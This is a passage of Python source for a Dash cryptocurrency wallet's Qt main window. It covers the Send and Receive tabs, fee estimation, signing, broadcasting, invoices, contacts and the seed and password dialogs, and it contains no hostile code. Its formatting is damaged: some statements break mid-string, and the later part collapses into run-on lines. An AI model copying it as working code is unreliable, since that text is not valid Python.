        self.receive_address_e.setText(addr)
        self.new_request_button.setEnabled(True)

    def update_receive_qr(self):
        """Regenerate the Receive-tab QR code (and detached QR window, if
        open) from the current address/amount/message fields."""
        addr = str(self.receive_address_e.text())
        amount = self.receive_amount_e.get_amount()
        message = self.receive_message_e.text()
        self.save_request_button.setEnabled((amount is not None) or (message != ""))
        uri = util.create_URI(addr, amount, message)
        self.receive_qr.setData(uri)
        if self.qr_window and self.qr_window.isVisible():
            self.qr_window.set_content(addr, amount, message, uri)

    def create_send_tab(self):
        # A 4-column grid layout. All the stretch is in the last column.
        # The exchange rate plugin adds a fiat widget in column 2
        self.send_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)

        from .paytoedit import PayToEdit
        self.amount_e = BTCAmountEdit(self.get_decimal_point)
        self.payto_e = PayToEdit(self)
        msg = _('Recipient of the funds.') + '\n\n'\
              + _('You may enter a Dash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Dash address)')
        payto_label = HelpLabel(_('Pay to'), msg)
        grid.addWidget(payto_label, 1, 0)
        grid.addWidget(self.payto_e, 1, 1, 1, -1)

        # Autocomplete recipient names from the contacts model.
        completer = QCompleter()
        completer.setCaseSensitivity(False)
        self.payto_e.setCompleter(completer)
        completer.setModel(self.completions)

        msg = _('Description of the transaction (not mandatory).') + '\n\n'\
              + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
        description_label = HelpLabel(_('Description'), msg)
        grid.addWidget(description_label, 2, 0)
        self.message_e = MyLineEdit()
        grid.addWidget(self.message_e, 2, 1, 1, -1)

        # "From" list shows explicitly selected coins (see set_pay_from).
        self.from_label = QLabel(_('From'))
        grid.addWidget(self.from_label, 3, 0)
        self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
        self.from_list.setHeaderHidden(True)
        self.from_list.setMaximumHeight(80)
        grid.addWidget(self.from_list, 3, 1, 1, -1)
        self.set_pay_from([])

        msg = _('Amount to be sent.') + '\n\n' \
              + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
              + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
              + _('Keyboard shortcut: type "!" to send all your coins.')
        amount_label = HelpLabel(_('Amount'), msg)
        grid.addWidget(amount_label, 4, 0)
        grid.addWidget(self.amount_e, 4, 1)

        self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_send_e.setVisible(False)
        grid.addWidget(self.fiat_send_e, 4, 2)
        self.amount_e.frozen.connect(
            lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))

        self.max_button = EnterButton(_("Max"), self.spend_max)
        self.max_button.setFixedWidth(140)
        grid.addWidget(self.max_button, 4, 3)
        hbox = QHBoxLayout()
        hbox.addStretch(1)
        grid.addLayout(hbox, 4, 4)

        msg = _('Dash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
              + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
              + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
        self.fee_e_label = HelpLabel(_('Fee'), msg)

        def fee_cb(dyn, pos, fee_rate):
            # Slider callback: persist either the dynamic fee level or the
            # static fee/kB, then recompute the transaction.
            if dyn:
                self.config.set_key('fee_level', pos, False)
            else:
                self.config.set_key('fee_per_kb', fee_rate, False)
            self.spend_max() if self.is_max else self.update_fee()

        self.fee_slider = FeeSlider(self, self.config, fee_cb)
        self.fee_slider.setFixedWidth(140)

        self.fee_e = BTCAmountEdit(self.get_decimal_point)
        if not self.config.get('show_fee', False):
            self.fee_e.setVisible(False)
        self.fee_e.textEdited.connect(self.update_fee)
        # This is so that when the user blanks the fee and moves on,
        # we go back to auto-calculate mode and put a fee back.
        self.fee_e.editingFinished.connect(self.update_fee)
        self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)

        grid.addWidget(self.fee_e_label, 5, 0)
        grid.addWidget(self.fee_slider, 5, 1)
        grid.addWidget(self.fee_e, 5, 2)

        self.preview_button = EnterButton(_("Preview"), self.do_preview)
        self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
        self.send_button = EnterButton(_("Send"), self.do_send)
        self.clear_button = EnterButton(_("Clear"), self.do_clear)
        buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.clear_button)
        buttons.addWidget(self.preview_button)
        buttons.addWidget(self.send_button)
        grid.addLayout(buttons, 6, 1, 1, 3)

        self.amount_e.shortcut.connect(self.spend_max)
        self.payto_e.textChanged.connect(self.update_fee)
        self.amount_e.textEdited.connect(self.update_fee)

        def reset_max(t):
            # Any manual edit cancels send-max mode.
            self.is_max = False
            self.max_button.setEnabled(not bool(t))
        self.amount_e.textEdited.connect(reset_max)
        self.fiat_send_e.textEdited.connect(reset_max)

        def entry_changed():
            # Recolor amount/fee fields to reflect funding/modification state.
            text = ""
            if self.not_enough_funds:
                amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
                text = _( "Not enough funds" )
                c, u, x = self.wallet.get_frozen_balance()
                if c+u+x:
                    text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
            elif self.fee_e.isModified():
                amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
            elif self.amount_e.isModified():
                amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
            else:
                amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
            self.statusBar().showMessage(text)
            self.amount_e.setStyleSheet(amt_color.as_stylesheet())
            self.fee_e.setStyleSheet(fee_color.as_stylesheet())

        self.amount_e.textChanged.connect(entry_changed)
        self.fee_e.textChanged.connect(entry_changed)

        self.invoices_label = QLabel(_('Invoices'))
        from .invoice_list import InvoiceList
        self.invoice_list = InvoiceList(self)

        vbox0 = QVBoxLayout()
        vbox0.addLayout(grid)
        hbox = QHBoxLayout()
        hbox.addLayout(vbox0)
        w = QWidget()
        w.setObjectName("send_container")
        vbox = QVBoxLayout(w)
        vbox.addLayout(hbox)
        vbox.addStretch(1)
        vbox.addWidget(self.invoices_label)
        vbox.addWidget(self.invoice_list)
        vbox.setStretchFactor(self.invoice_list, 1000)
        w.searchable_list = self.invoice_list
        run_hook('create_send_tab', grid)
        return w

    def spend_max(self):
        """Enter send-max mode and recompute amount/fee immediately."""
        self.is_max = True
        self.do_update_fee()

    def update_fee(self):
        # Deferred: the actual recomputation runs from timer_actions().
        self.require_fee_update = True

    def get_payto_or_dummy(self):
        """Return the entered recipient, or a dummy wallet address so a fee
        estimate can still be computed before a recipient is typed."""
        r = self.payto_e.get_recipient()
        if r:
            return r
        return (TYPE_ADDRESS, self.wallet.dummy_address())

    def do_update_fee(self):
        '''Recalculate the fee.  If the fee was manually input, retain it, but
        still build the TX to see if there are enough funds.
        '''
        if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
            self.statusBar().showMessage(_('Waiting for fee estimates...'))
            return False
        freeze_fee = (self.fee_e.isModified()
                      and (self.fee_e.text() or self.fee_e.hasFocus()))
        amount = '!'
if self.is_max else self.amount_e.get_amount()
        if amount is None:
            # No amount entered: clear derived state.
            if not freeze_fee:
                self.fee_e.setAmount(None)
            self.not_enough_funds = False
            self.statusBar().showMessage('')
        else:
            fee = self.fee_e.get_amount() if freeze_fee else None
            outputs = self.payto_e.get_outputs(self.is_max)
            if not outputs:
                # Use a placeholder recipient so size/fee can be estimated.
                _type, addr = self.get_payto_or_dummy()
                outputs = [(_type, addr, amount)]
            try:
                is_sweep = bool(self.tx_external_keypairs)
                tx = self.wallet.make_unsigned_transaction(
                    self.get_coins(), outputs, self.config, fee, is_sweep=is_sweep)
                self.not_enough_funds = False
            except NotEnoughFunds:
                self.not_enough_funds = True
                if not freeze_fee:
                    self.fee_e.setAmount(None)
                return
            except BaseException:
                # Draft tx construction can fail for transient reasons;
                # leave the UI as-is.
                return

            if not freeze_fee:
                fee = None if self.not_enough_funds else tx.get_fee()
                self.fee_e.setAmount(fee)

            if self.is_max:
                amount = tx.output_value()
                self.amount_e.setAmount(amount)
            if fee is None:
                return

    def from_list_delete(self, item):
        """Remove one explicitly selected coin from the 'From' list."""
        i = self.from_list.indexOfTopLevelItem(item)
        self.pay_from.pop(i)
        self.redraw_from_list()
        self.update_fee()

    def from_list_menu(self, position):
        """Context menu for the 'From' coin list."""
        item = self.from_list.itemAt(position)
        menu = QMenu()
        menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
        menu.exec_(self.from_list.viewport().mapToGlobal(position))

    def set_pay_from(self, coins):
        """Replace the set of explicitly selected spendable coins."""
        self.pay_from = list(coins)
        self.redraw_from_list()

    def redraw_from_list(self):
        self.from_list.clear()
        self.from_label.setHidden(len(self.pay_from) == 0)
        self.from_list.setHidden(len(self.pay_from) == 0)

        def format(x):
            # Abbreviated outpoint plus the funding address.
            h = x.get('prevout_hash')
            return h[0:10] + '...'
+ h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')

        for item in self.pay_from:
            self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))

    def get_contact_payto(self, key):
        """Render a contact as a 'label <address>' pay-to string."""
        _type, label = self.contacts.get(key)
        return label + ' <' + key + '>' if _type == 'address' else key

    def update_completions(self):
        """Rebuild the recipient autocompletion list from contacts."""
        l = [self.get_contact_payto(key) for key in self.contacts.keys()]
        self.completions.setStringList(l)

    def protected(func):
        '''Password request wrapper.  The password is passed to the function
        as the 'password' named argument.  "None" indicates either an
        unencrypted wallet, or the user cancelled the password request.
        An empty input is passed as the empty string.'''
        def request_password(self, *args, **kwargs):
            parent = self.top_level_window()
            password = None
            while self.wallet.has_password():
                password = self.password_dialog(parent=parent)
                if password is None:
                    # User cancelled password input
                    return
                try:
                    self.wallet.check_password(password)
                    break
                except Exception as e:
                    # Wrong password: report and ask again.
                    self.show_error(str(e), parent=parent)
                    continue

            kwargs['password'] = password
            return func(self, *args, **kwargs)
        return request_password

    def read_send_tab(self):
        """Collect and validate the Send tab's inputs.

        Returns (outputs, fee, label, coins) on success, or None after
        showing the relevant error dialog.
        """
        if self.payment_request and self.payment_request.has_expired():
            self.show_error(_('Payment request has expired'))
            return
        label = self.message_e.text()
        if self.payment_request:
            outputs = self.payment_request.get_outputs()
        else:
            errors = self.payto_e.get_errors()
            if errors:
                self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
                return
            outputs = self.payto_e.get_outputs(self.is_max)
            if self.payto_e.is_alias and self.payto_e.validated is False:
                alias = self.payto_e.toPlainText()
                msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
                msg += _('Do you wish to continue?')
                if not self.question(msg):
                    return
        if not outputs:
            self.show_error(_('No
outputs'))
            return
        for _type, addr, amount in outputs:
            if addr is None:
                self.show_error(_('Dash Address is None'))
                return
            if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
                self.show_error(_('Invalid Dash Address'))
                return
            if amount is None:
                self.show_error(_('Invalid Amount'))
                return

        # Respect a manually entered fee only while the field is visible
        # and actually modified.
        freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
        fee = self.fee_e.get_amount() if freeze_fee else None
        coins = self.get_coins()
        return outputs, fee, label, coins

    def do_preview(self):
        self.do_send(preview = True)

    def do_send(self, preview = False):
        """Build, confirm, sign and (unless previewing) broadcast the
        transaction described by the Send tab."""
        if run_hook('abort_send', self):
            return
        r = self.read_send_tab()
        if not r:
            return
        outputs, fee, tx_desc, coins = r
        try:
            is_sweep = bool(self.tx_external_keypairs)
            tx = self.wallet.make_unsigned_transaction(
                coins, outputs, self.config, fee, is_sweep=is_sweep)
        except NotEnoughFunds:
            self.show_message(_("Insufficient funds"))
            return
        except BaseException as e:
            traceback.print_exc(file=sys.stdout)
            self.show_message(str(e))
            return

        amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
        fee = tx.get_fee()

        # Refuse fees below the relay fee — such txs would not propagate.
        if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
            self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
            return

        if preview:
            self.show_transaction(tx, tx_desc)
            return

        # confirmation dialog
        msg = [
            _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
            _("Mining fee") + ": " + self.format_amount_and_units(fee),
        ]

        x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
        if x_fee:
            x_fee_address, x_fee_amount = x_fee
            msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )

        # Warn when the fee is more than twice the configured maximum rate.
        confirm_rate = 2 * self.config.max_fee_rate()
        if fee > confirm_rate * tx.estimated_size() / 1000:
            msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))

        if self.wallet.has_password():
            msg.append("")
            msg.append(_("Enter your password to proceed"))
            password = self.password_dialog('\n'.join(msg))
            if not password:
                return
        else:
            msg.append(_('Proceed?'))
            password = None
            if not self.question('\n'.join(msg)):
                return

        def sign_done(success):
            if success:
                if not tx.is_complete():
                    # Partially signed (e.g. multisig): show for export.
                    self.show_transaction(tx)
                    self.do_clear()
                else:
                    self.broadcast_transaction(tx, tx_desc)
        self.sign_tx_with_password(tx, sign_done, password)

    @protected
    def sign_tx(self, tx, callback, password):
        self.sign_tx_with_password(tx, callback, password)

    def sign_tx_with_password(self, tx, callback, password):
        '''Sign the transaction in a separate thread.  When done, calls
        the callback with a success code of True or False.
        '''
        def on_signed(result):
            callback(True)
        def on_failed(exc_info):
            self.on_error(exc_info)
            callback(False)

        if self.tx_external_keypairs:
            # can sign directly
            task = partial(Transaction.sign, tx, self.tx_external_keypairs)
        else:
            # call hook to see if plugin needs gui interaction
            run_hook('sign_tx', self, tx)
            task = partial(self.wallet.sign_transaction, tx, password)
        WaitingDialog(self, _('Signing transaction...'), task,
                      on_signed, on_failed)

    def broadcast_transaction(self, tx, tx_desc):

        def broadcast_thread():
            # non-GUI thread
            pr = self.payment_request
            if pr and pr.has_expired():
                self.payment_request = None
                return False, _("Payment request has expired")
            status, msg = self.network.broadcast(tx)
            if pr and status is True:
                # BIP70 flow: mark invoice paid and send the payment ACK.
                self.invoices.set_paid(pr, tx.txid())
                self.invoices.save()
                self.payment_request = None
                refund_address = self.wallet.get_receiving_addresses()[0]
                ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
                if ack_status:
                    msg = ack_msg
            return status, msg

        # Capture current TL window; override might be removed on return
        parent = self.top_level_window()

        def broadcast_done(result):
            # GUI thread
            if result:
                status, msg = result
                if status:
                    if tx_desc is not None and tx.is_complete():
                        self.wallet.set_label(tx.txid(), tx_desc)
                    parent.show_message(_('Payment sent.') + '\n' + msg)
                    self.invoice_list.update()
                    self.do_clear()
                else:
                    parent.show_error(msg)

        WaitingDialog(self, _('Broadcasting transaction...'),
                      broadcast_thread, broadcast_done, self.on_error)

    def query_choice(self, msg, choices):
        # Needed by QtHandler for hardware wallets
        dialog = WindowModalDialog(self.top_level_window())
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout(dialog)
        vbox.addLayout(clayout.layout())
        vbox.addLayout(Buttons(OkButton(dialog)))
        if not dialog.exec_():
            return None
        return clayout.selected_index()

    def lock_amount(self, b):
        """Freeze/unfreeze the amount field (used by payment requests)."""
        self.amount_e.setFrozen(b)
        self.max_button.setEnabled(not b)

    def prepare_for_payment_request(self):
        """Switch to the Send tab frozen in payment-request mode while the
        request is being fetched."""
        self.show_send_tab()
        self.payto_e.is_pr = True
        for e in [self.payto_e, self.amount_e, self.message_e]:
            e.setFrozen(True)
        self.payto_e.setText(_("please wait..."))
        return True

    def delete_invoice(self, key):
        self.invoices.remove(key)
        self.invoice_list.update()

    def payment_request_ok(self):
        """A payment request verified OK: populate the Send tab from it."""
        pr = self.payment_request
        key = self.invoices.add(pr)
        status = self.invoices.get_status(key)
        self.invoice_list.update()
        if status == PR_PAID:
            self.show_message("invoice already paid")
            self.do_clear()
            self.payment_request = None
            return
        self.payto_e.is_pr = True
        # Color the recipient field by request validity.
        if not pr.has_expired():
            self.payto_e.setGreen()
        else:
            self.payto_e.setExpired()
        self.payto_e.setText(pr.get_requestor())
        self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
        self.message_e.setText(pr.get_memo())
        # signal to set fee
        self.amount_e.textEdited.emit("")

    def payment_request_error(self):
        self.show_message(self.payment_request.error)
        self.payment_request = None
        self.do_clear()

    def on_pr(self, request):
        # Callback from the network thread: relay to the GUI via signals.
        self.payment_request = request
        if self.payment_request.verify(self.contacts):
            self.payment_request_ok_signal.emit()
        else:
            self.payment_request_error_signal.emit()

    def pay_to_URI(self, URI):
        """Populate the Send tab from a dash: payment URI."""
        if not URI:
            return
        try:
            out = util.parse_URI(URI, self.on_pr)
        except BaseException as e:
            self.show_error(_('Invalid Dash URI:') + '\n' + str(e))
            return
        self.show_send_tab()
        r = out.get('r')
        sig = out.get('sig')
        name =
out.get('name')
        # A request URL or a signed name means a BIP70 request will be
        # fetched asynchronously; just freeze the tab and wait.
        if r or (name and sig):
            self.prepare_for_payment_request()
            return
        address = out.get('address')
        amount = out.get('amount')
        label = out.get('label')
        message = out.get('message')
        # use label as description (not BIP21 compliant)
        if label and not message:
            message = label
        if address:
            self.payto_e.setText(address)
        if message:
            self.message_e.setText(message)
        if amount:
            self.amount_e.setAmount(amount)
            self.amount_e.textEdited.emit("")

    def do_clear(self):
        """Reset the Send tab to its pristine state."""
        self.is_max = False
        self.not_enough_funds = False
        self.payment_request = None
        self.payto_e.is_pr = False
        for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
            e.setText('')
            e.setFrozen(False)
        self.set_pay_from([])
        self.tx_external_keypairs = {}
        self.update_status()
        run_hook('do_clear', self)

    def set_frozen_state(self, addrs, freeze):
        """Freeze or unfreeze `addrs` and refresh the affected views."""
        self.wallet.set_frozen_state(addrs, freeze)
        self.address_list.update()
        self.utxo_list.update()
        self.update_fee()

    def create_list_tab(self, l, list_header=None):
        """Wrap a list widget (and optional header buttons) in a tab page."""
        w = QWidget()
        w.searchable_list = l
        vbox = QVBoxLayout()
        w.setLayout(vbox)
        vbox.setContentsMargins(0, 0, 0, 0)
        vbox.setSpacing(0)
        vbox.addWidget(l)
        if list_header:
            w.setObjectName("list_header")
            hbox = QHBoxLayout()
            for b in list_header:
                hbox.addWidget(b)
            hbox.addStretch()
            vbox.addLayout(hbox)
        return w

    def create_addresses_tab(self):
        from .address_list import AddressList
        self.address_list = l = AddressList(self)
        l.setObjectName("addresses_container")
        return self.create_list_tab(l, l.get_list_header())

    def create_utxo_tab(self):
        from .utxo_list import UTXOList
        self.utxo_list = l = UTXOList(self)
        l.setObjectName("utxo_container")
        return self.create_list_tab(l)

    def create_contacts_tab(self):
        from .contact_list import ContactList
        self.contact_list = l = ContactList(self)
        l.setObjectName("contacts_container")
        return self.create_list_tab(l)

    def create_proposals_tab(self):
        # NOTE(review): this is the only absolute import here — every sibling
        # tab uses a relative `from .module import ...`.  Presumably
        # masternode_budget_widgets lives outside this package; verify, as a
        # relative import may be intended.
        from masternode_budget_widgets import ProposalsTab
        self.proposals_list = ProposalsTab(self)
        return self.proposals_list

    def
update_proposals_tab(self):
        # Disabled until API is stable.
        return
        # Unreachable below by design (kept for when the API stabilizes).
        if not self.masternode_manager:
            return
        self.proposals_list.update(list(self.network.all_proposals))

    def remove_address(self, addr):
        """Delete `addr` from the wallet after user confirmation."""
        if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
            self.wallet.delete_address(addr)
            self.address_list.update()
            self.history_list.update()
            self.clear_receive_tab()

    def get_coins(self):
        """Coins to spend: the explicit 'From' selection if any, else all
        spendable coins."""
        if self.pay_from:
            return self.pay_from
        else:
            return self.wallet.get_spendable_coins(None, self.config)

    def spend_coins(self, coins):
        self.set_pay_from(coins)
        self.show_send_tab()
        self.update_fee()

    def paytomany(self):
        """Switch the Pay-to field into multi-output (CSV) mode."""
        self.show_send_tab()
        self.payto_e.paytomany()
        msg = '\n'.join([
            _('Enter a list of outputs in the \'Pay to\' field.'),
            _('One output per line.'),
            _('Format: address, amount'),
            _('You may load a CSV file using the file icon.')
        ])
        self.show_message(msg, title=_('Pay to many'))

    def payto_contacts(self, labels):
        """Pre-fill the Send tab with one or several contacts."""
        paytos = [self.get_contact_payto(label) for label in labels]
        self.show_send_tab()
        if len(paytos) == 1:
            self.payto_e.setText(paytos[0])
            self.amount_e.setFocus()
        else:
            # Multiple recipients: one "payto, 0" line each.
            text = "\n".join([payto + ", 0" for payto in paytos])
            self.payto_e.setText(text)
            self.payto_e.setFocus()

    def set_contact(self, label, address):
        """Add/replace a contact; returns False for an invalid address."""
        if not is_address(address):
            self.show_error(_('Invalid Address'))
            self.contact_list.update()  # Displays original unchanged value
            return False
        self.contacts[address] = ('address', label)
        self.contact_list.update()
        self.history_list.update()
        self.update_completions()
        return True

    def delete_contacts(self, labels):
        if not self.question(_("Remove %s from your list of contacts?")
                             % " + ".join(labels)):
            return
        for label in labels:
            self.contacts.pop(label)
        self.history_list.update()
        self.contact_list.update()
        self.update_completions()

    def show_invoice(self, key):
        pr = self.invoices.get(key)
        pr.verify(self.contacts)
        self.show_pr_details(pr)

    def show_pr_details(self, pr):
        """Modal dialog with the details of a BIP70 payment request."""
        key = pr.get_id()
        d = WindowModalDialog(self, _("Invoice"))
        vbox =
QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if expires: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(expires)), 4, 1) vbox.addLayout(grid) def do_export(): fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70") if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('Invoice saved as' + ' ' + fn)) exportButton = EnterButton(_('Save'), do_export) def do_delete(): if self.question(_('Delete invoice?')): self.invoices.remove(key) self.history_list.update() self.invoice_list.update() d.close() deleteButton = EnterButton(_('Delete'), do_delete) vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d))) d.exec_() def do_pay_invoice(self, key): pr = self.invoices.get(key) self.payment_request = pr self.prepare_for_payment_request() pr.error = None # this forces verify() to re-run if pr.verify(self.contacts): self.payment_request_ok() else: self.payment_request_error() def create_console_tab(self): from .console import Console self.console = console = Console() console.setObjectName("console_container") return console def update_console(self): console = self.console console.history = self.config.get("console-history",[]) console.history_index = len(console.history) console.updateNamespace({'wallet' : self.wallet, 'network' : self.network, 'plugins' : self.gui_object.plugins, 'window': self}) console.updateNamespace({'util' : util, 'bitcoin':bitcoin}) c = 
commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args: f(method, args, self.password_dialog) for m in dir(c): if m[0]=='_' or m in ['network','wallet']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) qtVersion = qVersion() self.balance_label = QLabel("") self.balance_label.setObjectName("main_window_balance") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.lock_icon = QIcon() self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self)) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def update_lock_icon(self): icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.can_change_password()) self.send_button.setVisible(not self.wallet.is_watching_only()) def change_password_dialog(self): from .password_dialog import ChangePasswordDialog d = ChangePasswordDialog(self, self.wallet) ok, password, 
new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(password, new_password, encrypt_file) except BaseException as e: self.show_error(str(e)) return except: traceback.print_exc(file=sys.stdout) self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(280) line2 = QLineEdit() line2.setFixedWidth(280) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() 
mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) # only show the combobox in case multiple accounts are available if len(mpk_list) > 1: def label(key): if isinstance(self.wallet, Multisig_Wallet): return _("cosigner") + ' ' + str(key+1) return '' labels = [label(i) for i in range(len(mpk_list))] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(dialog))) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) self.gui_object.daemon.stop_wallet(wallet_path) self.close() os.unlink(wallet_path) self.show_error("Wallet removed:" + basename) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(str(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: traceback.print_exc(file=sys.stdout) self.show_message(str(e)) return xtype = 
